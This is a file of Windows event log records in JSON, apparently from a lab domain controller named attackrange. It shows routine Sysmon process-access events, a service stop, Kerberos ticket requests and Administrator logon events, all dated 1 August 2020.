{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4897,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4898,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4899,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4900,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4901,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76856,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the stopped state.","param1":"Update Orchestrator Service for Windows Update","param2":"stopped","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220568,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220569,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{033CEA9D-C85B-510A-E7F6-EF589B00EB10}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{033CEA9D-C85B-510A-E7F6-EF589B00EB10}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220570,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{033CEA9D-C85B-510A-E7F6-EF589B00EB10}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{033CEA9D-C85B-510A-E7F6-EF589B00EB10}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220571,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BF72\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{033CEA9D-C85B-510A-E7F6-EF589B00EB10}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7bf72","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{033CEA9D-C85B-510A-E7F6-EF589B00EB10}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
